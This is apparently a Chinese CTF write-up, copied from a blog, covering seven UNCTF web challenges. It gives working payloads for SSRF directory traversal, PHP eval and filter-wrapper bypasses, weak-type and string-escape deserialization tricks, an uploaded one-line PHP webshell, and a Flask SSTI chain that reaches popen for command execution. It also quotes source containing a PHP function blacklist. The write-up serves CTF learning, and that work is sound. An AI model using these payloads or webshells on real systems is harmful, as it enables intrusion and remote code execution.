Web
0x01:easy_ssrf
代碼很簡單,參數(shù)中要有unctf.com,而且過濾了??php|file|zip|bzip|zlib|base|data?
?,導致很多協(xié)議用不了,查了查資料發(fā)現(xiàn)涉及到SSRF file_get_contents函數(shù)都是利用的file協(xié)議等,一開始也沒思路要怎么繞過去。
然后查了一篇師傅的博客記載了一個SSRF的一個黑魔法:
當PHP的 file_get_contents() 函數(shù)在遇到不認識的偽協(xié)議頭時候會將偽協(xié)議頭當做文件夾,造成目錄穿越漏洞,這時候只需不斷往上跳轉目錄即可讀到根目錄的文件。這個方法可以在SSRF的眾多協(xié)議被ban的情況下來進行讀取文件
發(fā)現(xiàn)確實可以造成目錄穿越,直接讀取下flag
0x02:babyeval
過濾了帶括號的函數(shù),可以使用??echo?
?進行輸出內容,通過include包含??flag.php?
?,再輸出變量即可(感覺是非預期,因為ob_start函數(shù)沒有用到)
payload:
?a=include "flag.php";echo $flag;
ob_start([string output_callback])- 打開輸出緩沖區(qū),所有的輸出信息不在直接發(fā)送到瀏覽器,而是保存在輸出緩沖區(qū)里面,可選得回調函數(shù)用于處理輸出結果信息。
這道題設置的是輸出信息中不能存在flag,所以可以利用編碼繞過
?a=echo `base64 flag.php`;
也可以通過include+偽協(xié)議去讀取
?a=include 'php://filter/read=convert.base64-encode/resource=./flag.php';
0x03:ezphp
bool類型的true跟任意字符串可以弱類型相等。因此我們可以構造bool類型的序列化數(shù)據(jù) ,無論比較的值是什么,結果都為true
payload:
<?php
error_reporting(0);
$shy='';
$shy=array("username"=>1,"password"=>1);
echo var_dump($shy);
echo var_dump(serialize($shy));
$shy='';
$shy=array("username"=>true,"password"=>true);
echo var_dump($shy);
echo var_dump(serialize($shy));
?>
0x04:easy_upload
上傳一個php文件,發(fā)現(xiàn)過濾了以下內容
perl|pyth|ph|auto|curl|base||>|rm|ryby|openssl|war|lua|msf|xter|telnet in contents!
查了資料,發(fā)現(xiàn)是De1CTF2020的原題,既然過濾了ph,可以使用換行進行繞過
還過濾了??>?
?,可以使用
<?=eval($_POST['cmd']);
#繞過<?php ?>限制的一句話
上傳進去,蟻劍連接之后便可以在根目錄中發(fā)現(xiàn)flag
0x05:L0vephp
提示是查看頁面源碼
一開始也不知道是什么編碼,查了查字資料發(fā)現(xiàn)是base85(也稱為Ascii85)
?
在線解一下,得到
提示讀取一下源碼,嘗試一下偽協(xié)議讀取,發(fā)現(xiàn)
?action=php://filter/read=convert.base64-encode/resource=index.php
發(fā)現(xiàn)被過濾了,再試試其他方法,發(fā)現(xiàn)換成以下兩種都可以
?action=php://filter/read=string.toupper|string.rot13/resource=flag.php
?action=php://filter/convert.quoted-printable-encode/resource=flag.php
解密得到
<!--?PHP
$FLAG = "UNCTF{7HIS_IS_@_F4KE_F1A9}";
//HINT:316E4433782E706870
?-->
得到1nD3x.php,得到以下源碼
<?php
error_reporting(0);
show_source(__FILE__);
$code=$_REQUEST['code'];
$_=array('@','~','^','&','?','<','>','*','`','+','-',''','"','\\','/');
$__=array('eval','system','exec','shell_exec','assert','passthru','array_map','ob_start','create_function','call_user_func','call_user_func_array','array_filter','proc_open');
$blacklist1 = array_merge($_);
$blacklist2 = array_merge($__);
if (strlen($code)>16){
die('Too long');
}
foreach ($blacklist1 as $blacklisted) {
if (preg_match ('/' . $blacklisted . '/m', $code)) {
die('WTF???');
}
}
foreach ($blacklist2 as $blackitem) {
if (preg_match ('/' . $blackitem . '/im', $code)) {
die('Sry,try again');
}
}
($code);
?>
之前無命令進行構造,長度沒有限制的這么短,而且這道題過濾了很多,之前的異或什么的都走不通,查資料看了P神的這篇文章,發(fā)現(xiàn)了新的思路,真的是tttttql
?
按照P神的payload即可獲取到flag,有空要仔細研究一下。
0x06:easyflask
一看名字就猜測是不是??ssti?
?,進去之后需要先以admin用戶登陸進去,發(fā)現(xiàn)存在login和register路由,以admin用戶注冊一個賬號即可獲取到/secret_route_you_do_not_know路由
http://697940e0-e21b-4cad-8504-a3834c796ea7.node1.hackingfor.fun/secret_route_you_do_not_know?guess={{config}}
在該路由下存在ssti漏洞,但是過濾以下字符
' " [ ] _
可以使用??|attr和request.args.xx?
?來繞過下劃線和引號,??request.args?
?存儲著請求參數(shù)以及其值的字典,接下來就是構造payload即可
{{()|attr(request.args.class)|attr(request.args.bases)|attr(request.args.subclasses)()|attr(request.args.a)(117)|attr(request.args.b)|attr(request.args.c)|attr(request.args.d)(request.args.e)(request.args.f)|attr(request.args.g)()}}&class=__class__&bases=__base__&subclasses=__subclasses__&a=__getitem__&b=__init__&c=__globals__&d=get&e=popen&f=cat flag.txt&g=read
0x07:easyunserialize
先拉到本地測試一下,修改一下源碼,讓結果回顯出來
觀察代碼也很簡單,用戶名沒有限制,密碼必須為easy,才可以得到flag,就先正常反序列化一個這樣的payload
O:1:"a":3:{s:5:"uname";s:5:"1emon";s:8:"password";s:4:"easy";}
其中??";s:8:"password";s:4:"easy";}?
?是29個字符,下面就是一個數(shù)學問題了,過濾后字符變多了四個,把??";s:8:"password";s:4:"easy";}?
?給擠出去,閉合之前的值??1?
?即可
strlen(challenge(9)*n+29)=strlen(easychallenge(13)*n)
9*n+29=13*n
4n=29+3
n=>8
多出三個字符,前面肯定是不能添加的,所以可以放在最后面,根據(jù)反序列化的特點超出的部分并不會被反序列化成功,所以不會產(chǎn)生任何影響,payload如下:
?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}shy
總結
還有幾道題當時沒做出來,等這幾天事忙了完,再回頭了做下!
本文摘自 :https://blog.51cto.com/u